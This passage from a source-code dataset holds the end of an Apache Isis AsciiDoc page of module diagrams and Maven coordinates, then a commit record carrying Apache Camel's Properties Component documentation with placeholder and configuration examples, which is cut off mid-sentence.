200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Incubator\\n[Software System]\" {\n rectangle \"==Apache Isis Incubator\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Incubator)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Incubator\n[source,yaml]\n----\nGroup: org.apache.isis.incubator\nArtifact: isis-incubator\nType: pom\nDirectory: \/incubator\n----\n|Collection of Apache Isis extensions, subdomains or BC mappings, currently incubating.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n|===\n\n=== Kroviz Client\n\n[plantuml,Kroviz Client,svg]\n----\n@startuml(id=Kroviz_Client)\ntitle Kroviz Client - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Kroviz Client\\n[Software System]\" {\n rectangle \"==Apache Isis Inc - Client kroViz\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Kroviz Client)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Inc - Client kroViz\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.clients\nArtifact: isis-client-kroviz\nType: jar\nDirectory: \/incubator\/clients\/kroviz\n----\n|Initial sketches\n|===\n\n=== JavaFX Viewer\n\n[plantuml,JavaFX Viewer,svg]\n----\n@startuml(id=JavaFX_Viewer)\ntitle JavaFX Viewer - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JavaFX Viewer\\n[Software System]\" {\n rectangle \"==Apache Isis Inc - Viewer JavaFX\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Inc - Viewer JavaFX (Model)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Inc - Viewer JavaFX (UI Components)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Inc - Viewer JavaFX (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n@enduml\n----\n.Projects\/Modules (JavaFX Viewer)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Inc - Viewer JavaFX\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx\nType: pom\nDirectory: \/incubator\/viewers\/javafx\n----\n|Initial sketches\n\n|Apache Isis Inc - Viewer JavaFX (Model)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx-model\nType: jar\nDirectory: \/incubator\/viewers\/javafx\/model\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.openjfx:javafx-base:jar:<managed> +\norg.openjfx:javafx-controls:jar:<managed> +\norg.openjfx:javafx-fxml:jar:<managed> +\norg.openjfx:javafx-swing:jar:<managed> +\norg.openjfx:javafx-web:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer JavaFX (UI Components)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx-ui\nType: jar\nDirectory: \/incubator\/viewers\/javafx\/ui\n----\n|.Components\n****\no.a.i.incubator.viewer.javafx.ui.components.UiComponentFactoryFx +\no.a.i.incubator.viewer.javafx.ui.components.markup.MarkupFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.number.NumberFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.objectref.ObjectReferenceFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.other.FallbackFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.temporal.TemporalFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.text.TextFieldFactory +\no.a.i.incubator.viewer.javafx.ui.decorator.disabling.DisablingDecoratorForButton +\no.a.i.incubator.viewer.javafx.ui.decorator.disabling.DisablingDecoratorForFormField +\no.a.i.incubator.viewer.javafx.ui.decorator.icon.IconDecoratorForLabeled +\no.a.i.incubator.viewer.javafx.ui.decorator.icon.IconDecoratorForMenuItem +\no.a.i.incubator.viewer.javafx.ui.decorator.icon.IconServiceDefault +\no.a.i.incubator.viewer.javafx.ui.decorator.prototyping.PrototypingDecoratorForButton +\no.a.i.incubator.viewer.javafx.ui.decorator.prototyping.PrototypingDecoratorForFormField +\no.a.i.incubator.viewer.javafx.ui.decorator.prototyping.PrototypingInfoPopupProvider +\no.a.i.incubator.viewer.javafx.ui.main.MainViewFx +\no.a.i.incubator.viewer.javafx.ui.main.UiActionHandlerFx +\no.a.i.incubator.viewer.javafx.ui.main.UiBuilderFx +\no.a.i.incubator.viewer.javafx.ui.main.UiContextFxDefault +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.incubator.viewer:isis-viewer-javafx-model:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer JavaFX (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx-viewer\nType: jar\nDirectory: \/incubator\/viewers\/javafx\/viewer\n----\n|.Dependencies\n****\norg.apache.isis.incubator.viewer:isis-viewer-javafx-ui:jar:<managed> +\n****\n|===\n\n=== Vaadin Viewer\n\n[plantuml,Vaadin Viewer,svg]\n----\n@startuml(id=Vaadin_Viewer)\ntitle Vaadin Viewer - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Vaadin Viewer\\n[Software System]\" {\n rectangle \"==Apache Isis Inc - Viewer Vaadin\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Inc - Viewer Vaadin (Model)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Inc - Viewer Vaadin (UI Components)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Inc - Viewer Vaadin (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n@enduml\n----\n.Projects\/Modules (Vaadin Viewer)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Inc - Viewer Vaadin\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin\nType: pom\nDirectory: \/incubator\/viewers\/vaadin\n----\n|Initial sketches\n\n|Apache Isis Inc - Viewer Vaadin (Model)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin-model\nType: jar\nDirectory: \/incubator\/viewers\/vaadin\/model\n----\n|.Dependencies\n****\ncom.github.fge:jackson-coreutils:jar:1.8 +\ncom.vaadin:vaadin:jar:<managed> +\nio.swagger:swagger-compat-spec-parser:jar:1.0.39 +\nio.swagger:swagger-parser:jar:1.0.39 +\nio.swagger.core.v3:swagger-core:jar:2.0.5 +\nio.swagger.core.v3:swagger-models:jar:2.0.5 +\nio.swagger.parser.v3:swagger-parser-core:jar:2.0.5 +\nio.swagger.parser.v3:swagger-parser-v3:jar:2.0.5 +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer Vaadin (UI Components)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin-ui\nType: jar\nDirectory: \/incubator\/viewers\/vaadin\/ui\n----\n|.Components\n****\no.a.i.incubator.viewer.vaadin.ui.auth.LogoutHandlerVaa +\no.a.i.incubator.viewer.vaadin.ui.auth.VaadinAuthenticationHandler +\no.a.i.incubator.viewer.vaadin.ui.components.UiComponentFactoryVaa +\no.a.i.incubator.viewer.vaadin.ui.components.blob.BlobFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.clob.ClobFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.markup.MarkupFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.other.FallbackFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.temporal.TemporalFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.text.TextFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.text.uuid.UuidFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.pages.main.UiActionHandlerVaa +\no.a.i.incubator.viewer.vaadin.ui.pages.main.UiContextVaaDefault +\n****\n\n.Dependencies\n****\ncom.vaadin:vaadin-spring:jar:<managed> +\ncommons-fileupload:commons-fileupload:jar:1.4 +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-model:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer Vaadin (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin-viewer\nType: jar\nDirectory: \/incubator\/viewers\/vaadin\/viewer\n----\n|.Dependencies\n****\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-ui:jar:<managed> +\n****\n|===\n\n== Legacy\n\n[plantuml,Legacy,svg]\n----\n@startuml(id=Legacy)\ntitle Legacy - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Legacy\\n[Software System]\" {\n rectangle \"==Apache Isis Legacy\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Legacy - Applib\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Legacy - Commons\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Legacy - Metamodel\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Legacy - REST Client\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Legacy - Runtime\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n@enduml\n----\n.Projects\/Modules (Legacy)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Legacy\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy\nType: pom\nDirectory: \/legacy\n----\n|Collection of deprecated Apache Isis functionality, for removal.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Legacy - Applib\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-applib\nType: jar\nDirectory: \/legacy\/extensions\/core\/applib\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Components\n****\no.a.i.legacy.applib.DomainObjectContainer +\n****\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n|Apache Isis Legacy - Commons\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-commons\nType: jar\nDirectory: \/legacy\/extensions\/core\/commons\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n|Apache Isis Legacy - Metamodel\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-metamodel\nType: jar\nDirectory: \/legacy\/extensions\/core\/metamodel\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.legacy:isis-legacy-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n|Apache Isis Legacy - REST Client\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-restclient\nType: jar\nDirectory: \/legacy\/mappings\/restclient\n----\n|As defined in Isis v1.x RO Applib.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Legacy - Runtime\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-runtime\nType: jar\nDirectory: \/legacy\/extensions\/core\/runtime\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.legacy:isis-legacy-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n|===\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"753693663527721d09d7c703635755e7cbe90d18","subject":"Document Update","message":"Document Update\n\nThese changes are not present in javadoc file. I have reverted the changes as per the comments and also I have removed the changes which are done in the Javadoc file.\r\nhttps:\/\/github.com\/apache\/camel\/blob\/master\/core\/camel-base\/src\/main\/java\/org\/apache\/camel\/component\/properties\/PropertiesComponent.java","repos":"alvinkwekel\/camel,adessaigne\/camel,cunningt\/camel,alvinkwekel\/camel,mcollovati\/camel,pax95\/camel,nikhilvibhav\/camel,adessaigne\/camel,pax95\/camel,gnodet\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,adessaigne\/camel,cunningt\/camel,pax95\/camel,gnodet\/camel,christophd\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,apache\/camel,tadayosi\/camel,alvinkwekel\/camel,tdiesler\/camel,christophd\/camel,tdiesler\/camel,alvinkwekel\/camel,adessaigne\/camel,christophd\/camel,mcollovati\/camel,nikhilvibhav\/camel,christophd\/camel,nikhilvibhav\/camel,gnodet\/camel,tadayosi\/camel,nicolaferraro\/camel,apache\/camel,tadayosi\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nicolaferraro\/camel,mcollovati\/camel,mcollovati\/camel,pmoerenhout\/camel,tdiesler\/camel,tdiesler\/camel,pmoerenhout\/camel,tadayosi\/camel,christophd\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,apache\/camel,cunningt\/camel,gnodet\/camel,cunningt\/camel,nicolaferraro\/camel,christophd\/camel,apache\/camel,gnodet\/camel,tdiesler\/camel,pmoerenhout\/camel,apache\/camel,pmoerenhout\/camel,adessaigne\/camel,tdiesler\/camel,pax95\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/properties-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/properties-component.adoc","new_contents":"[[properties-component]]\n= Properties Component\n\/\/THIS FILE IS COPIED: EDIT THE SOURCE FILE:\n:page-source: core\/camel-base\/src\/main\/docs\/properties-component.adoc\n\/\/Written by hand, not generated.\n:docTitle: Properties\n:artifactId: camel-base\n:description: The properties component is used for property placeholders in your Camel application, such as endpoint URIs.\n:since: 2.3\n:supportLevel: Stable\n\n*Since Camel {since}*\n\nThe properties component is used for property placeholders in your Camel application, such as endpoint URIs.\nIt is *not* a regular Camel component with producer and consumer for routing messages. However for historical\nreasons it was named `PropertiesComponent` and this name is commonly known and therefore we keep using it.\n\n== Spring Boot Auto-Configuration\n\nThe component supports 10 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.properties.auto-discover-properties-sources* | Whether to automatically discovery instances of PropertiesSource from registry and service factory. | true | Boolean\n| *camel.component.properties.default-fallback-enabled* | If false, the component does not attempt to find a default for the key by looking after the colon separator. | true | Boolean\n| *camel.component.properties.encoding* | Encoding to use when loading properties file from the file system or classpath. If no encoding has been set, then the properties files is loaded using ISO-8859-1 encoding (latin-1) as documented by java.util.Properties#load(java.io.InputStream) | | String\n| *camel.component.properties.environment-variable-mode* | Sets the OS environment variables mode (0 = never, 1 = fallback, 2 = override). The default mode (override) is to use OS environment variables if present, and override any existing properties. OS environment variable mode is checked before JVM system property mode | 2 | Integer\n| *camel.component.properties.ignore-missing-location* | Whether to silently ignore if a location cannot be located, such as a properties file not found. | false | Boolean\n| *camel.component.properties.initial-properties* | Sets initial properties which will be used before any locations are resolved. The option is a java.util.Properties type. | | String\n| *camel.component.properties.location* | A list of locations to load properties. You can use comma to separate multiple locations. This option will override any default locations and only use the locations from this option. | | String\n| *camel.component.properties.override-properties* | Sets a special list of override properties that take precedence and will use first, if a property exist. The option is a java.util.Properties type. | | String\n| *camel.component.properties.properties-parser* | To use a custom PropertiesParser. The option is a org.apache.camel.component.properties.PropertiesParser type. | | String\n| *camel.component.properties.system-properties-mode* | Sets the JVM system property mode (0 = never, 1 = fallback, 2 = override). The default mode (override) is to use system properties if present, and override any existing properties. OS environment variable mode is checked before JVM system property mode | 2 | Integer\n|===\n\n[TIP]\n**Resolving property from Java code** +\nYou can use the method `resolvePropertyPlaceholders` on the\n`CamelContext` to resolve a property from any Java code.\n\n== Using PropertyPlaceholder\n\nCamel now provides a new `PropertiesComponent` in *camel-core* which\nallows you to use property placeholders when defining Camel\nEndpoint URIs.\n\nThis works much like you would do if using Spring's\n`<property-placeholder>` tag. However Spring have a limitation which\nprevents 3rd party frameworks to leverage Spring property placeholders\nto the fullest. See more at\nxref:manual:faq:how-do-i-use-spring-property-placeholder-with-camel-xml.adoc[How do\nI use Spring Property Placeholder with Camel XML].\n\n[TIP]\n**Bridging Spring and Camel property placeholders** +\nYou can bridge the Spring property placeholder\nwith Camel, see further below for more details.\n\nThe property placeholder is generally in use when doing:\n\n* lookup or creating endpoints\n* lookup of beans in the Registry\n* additional supported in Spring XML (see below in examples)\n* using Blueprint PropertyPlaceholder with Camel\nxref:properties-component.adoc[Properties] component\n* using `@PropertyInject` to inject a property in a POJO\n* Using default value if a property does not exist\n* Include out of the box functions, to lookup property\nvalues from OS environment variables, JVM system properties, or the\nservice idiom.\n* Using custom functions, which can be plugged into the\nproperty component.\n\n== Syntax\n\nThe syntax to use Camel's property placeholder is to use `{\\{key}}` for\nexample `{{file.uri}}` where `file.uri` is the property key.\n\nYou can use property placeholders in parts of the endpoint URI's which\nfor example you can use placeholders for parameters in the URIs.\n\nYou can specify a default value to use if\na property with the key does not exists, eg `file.url:\/some\/path` where\nthe default value is the text after the colon (eg \/some\/path).\n\n[NOTE]\n====\nDo not use colon in the property key. The colon is used as a separator\ntoken when you are providing a default value.\n====\n\n== Defining location\n\nThe properties component needs to know a location(s) where to resolve the\nproperties. You can define 1 to many locations. If you define the\nlocation in a single String property you can separate multiple locations\nwith comma such as:\n\n[source,java]\n----\npc.setLocation(\"com\/mycompany\/myprop.properties,com\/mycompany\/other.properties\");\n----\n\nYou can set which location can be discarded if missing by setting the ``optional`` attribute, which is false by default, i.e:\n\n[source,java]\n----\npc.setLocations(\n \"com\/mycompany\/override.properties;optional=true\"\n \"com\/mycompany\/defaults.properties\");\n----\n\n== Using system and environment variables in locations\n\nThe location now supports using placeholders for JVM system properties\nand OS environments variables.\n\nFor example:\n\n[source]\n----\nlocation=file:${karaf.home}\/etc\/foo.properties\n----\n\nIn the location above we defined a location using the file scheme using\nthe JVM system property with key `karaf.home`.\n\nTo use an OS environment variable instead you would have to prefix with\nenv:\n\n[source]\n----\nlocation=file:${env:APP_HOME}\/etc\/foo.properties\n----\n\nWhere `APP_HOME` is an OS environment.\n\n[NOTE]\n====\nSome OS'es (such as Linux) do not support dashes in environment variable names,\nso here we are using `APP_HOME`. But if you specify `APP-HOME` then Camel 3 will automatic lookup\nthe value as `APP_HOME` (with underscore) as fallback.\n====\n\nYou can have multiple placeholders in the same location, such as:\n\n[source]\n----\nlocation=file:${env:APP_HOME}\/etc\/${prop.name}.properties\n----\n\n== Configuring in Java DSL\n\nYou have to create and register the `PropertiesComponent` under the name\n`properties` such as:\n\n[source,java]\n----\nPropertiesComponent pc = camelContext.getPropertiesComponent();\npc.setLocation(\"classpath:com\/mycompany\/myprop.properties\");\n----\n\n== Configuring in Spring XML\n\nSpring XML offers two variations to configure. You can define a spring\nbean as a `PropertiesComponent` which resembles the way done in Java\nDSL. Or you can use the `<propertyPlaceholder>` tag.\n\n[source,xml]\n----\n<bean id=\"properties\" class=\"org.apache.camel.component.properties.PropertiesComponent\">\n <property name=\"location\" value=\"classpath:com\/mycompany\/myprop.properties\"\/>\n<\/bean>\n----\n\nUsing the `<propertyPlaceholder>` tag makes the configuration a bit more\nfresh such as:\n\n[source,xml]\n----\n<camelContext ...>\n <propertyPlaceholder id=\"properties\" location=\"com\/mycompany\/myprop.properties\"\/>\n<\/camelContext>\n----\n\nSetting the properties location through the location tag works just fine but sometimes you have a number of resources to take into account and starting from *Camel 2.19.0* you can set the properties location with a dedicated propertiesLocation:\n\n[source,xml]\n----\n<camelContext ...>\n <propertyPlaceholder id=\"myPropertyPlaceholder\">\n <propertiesLocation\n resolver = \"classpath\"\n path = \"com\/my\/company\/something\/my-properties-1.properties\"\n optional = \"false\"\/>\n <propertiesLocation\n resolver = \"classpath\"\n path = \"com\/my\/company\/something\/my-properties-2.properties\"\n optional = \"false\"\/>\n <propertiesLocation\n resolver = \"file\"\n path = \"${karaf.home}\/etc\/my-override.properties\"\n optional = \"true\"\/>\n <\/propertyPlaceholder>\n<\/camelContext>\n----\n\n[TIP]\n**Specifying the cache option inside XML** +\nCamel supports specifying a value for the cache option both\ninside the Spring as well as the Blueprint XML.\n\n== Using a Properties from the Registry\n\nFor example in OSGi you may want to expose a service which returns the\nproperties as a `java.util.Properties` object.\n\nThen you could setup the xref:properties-component.adoc[Properties] component as\nfollows:\n\n[source,xml]\n----\n <propertyPlaceholder id=\"properties\" location=\"ref:myProperties\"\/>\n----\n\nWhere `myProperties` is the id to use for lookup in the OSGi registry.\nNotice we use the `ref:` prefix to tell Camel that it should lookup the\nproperties for the Registry.\n\n== Examples using properties component\n\nWhen using property placeholders in the endpoint URIs you can either use\nthe `properties:` component or define the placeholders directly in the\nURI. We will show example of both cases, starting with the former.\n\n[source,java]\n----\n\/\/ properties\ncool.end=mock:result\n\n\/\/ route\nfrom(\"direct:start\").to(\"{{cool.end}}\");\n----\n\nYou can also use placeholders as a part of the endpoint uri:\n\n[source,java]\n----\n\/\/ properties\ncool.foo=result\n\n\/\/ route\nfrom(\"direct:start\").to(\"mock:{{cool.foo}}\");\n----\n\nIn the example above the to endpoint will be resolved to `mock:result`.\n\nYou can also have properties with refer to each other such as:\n\n[source,java]\n----\n\/\/ properties\ncool.foo=result\ncool.concat=mock:{{cool.foo}}\n\n\/\/ route\nfrom(\"direct:start\").to(\"mock:{{cool.concat}}\");\n----\n\nNotice how `cool.concat` refer to another property.\n\nAnd you can use placeholders several times:\n\n[source,java]\n----\n\/\/ properties\ncool.start=direct:start\ncool.showid=true\ncool.result=result\n\n\/\/ route\nfrom(\"{{cool.start}}\")\n .to(\"log:{{cool.start}}?showBodyType=false&showExchangeId={{cool.showid}}\")\n .to(\"mock:{{cool.result}}\");\n----\n\nYou can also your property placeholders when using\nProducerTemplate for example:\n\n[source,java]\n----\ntemplate.sendBody(\"{{cool.start}}\", \"Hello World\");\n----\n\n== Example with xref:languages:simple-language.adoc[Simple] language\n\nThe xref:languages:simple-language.adoc[Simple] language now also support using property\nplaceholders, for example in the route below:\n\n[source,java]\n----\n\/\/ properties\ncheese.quote=Camel rocks\n\n\/\/ route\nfrom(\"direct:start\")\n .transform().simple(\"Hi ${body} do you think ${properties:cheese.quote}?\");\n----\n\n== Additional property placeholder supported in Spring XML\n\nThe property placeholders is also supported in many of the Camel Spring\nXML tags such as\n`<package>, <packageScan>, <contextScan>, <jmxAgent>, <endpoint>, <routeBuilder>, <proxy>`\nand the others.\n\nThe example below has property placeholder in the `<jmxAgent>` tag:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <propertyPlaceholder id=\"properties\" location=\"org\/apache\/camel\/spring\/jmx.properties\"\/>\n <!-- we can use property placeholders when we define the JMX agent -->\n <jmxAgent id=\"agent\" disabled=\"{{myjmx.disabled}}\"\n usePlatformMBeanServer=\"{{myjmx.usePlatform}}\"\n statisticsLevel=\"RoutesOnly\" useHostIPAddress=\"true\"\/>\n <route id=\"foo\" autoStartup=\"false\">\n <from uri=\"seda:start\"\/>\n <to uri=\"mock:result\"\/>\n <\/route>\n<\/camelContext>\n----\n\nYou can also define property placeholders in the various attributes on\nthe `<camelContext>` tag such as `trace` as shown here:\n\n[source,xml]\n----\n<camelContext trace=\"{{foo.trace}}\" xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <propertyPlaceholder id=\"properties\" location=\"org\/apache\/camel\/spring\/processor\/myprop.properties\"\/>\n <template id=\"camelTemplate\" defaultEndpoint=\"{{foo.cool}}\"\/>\n <route>\n <from uri=\"direct:start\"\/>\n <setHeader name=\"{{foo.header}}\">\n <simple>${in.body} World!<\/simple>\n <\/setHeader>\n <to uri=\"mock:result\"\/>\n <\/route>\n<\/camelContext>\n----\n\n== Using JVM system properties or Environment variables as override or fallback values\n\nThe properties components supports using JVM system properties and also OS environment variables\nas values which can either be used as override or fallback values.\n\nThe default mode is that both of them are in override mode, and they are check in the following order:\n\n1. OS environment variable (override mode)\n2. JVM system property (override mode)\n3. Property files and other locations\n4. OS environment variable (fallback mode)\n5. JVM system property (fallback mode)\n\nThe check stops at first found property value for the key.\n\nYou can control these modes using the `systemPropertiesMode` and `environmentVariableMode`\noptions on the properties component.\n\n== Using property placeholders for any kind of attribute in the XML DSL\n\nIn the example below we use the `prop` prefix for the namespace\ncamel.apache.org\/schema\/placeholder by which we can use the\n`prop` prefix in the attributes in the XML DSLs. Notice how we use that\nin the Multicast to indicate that the 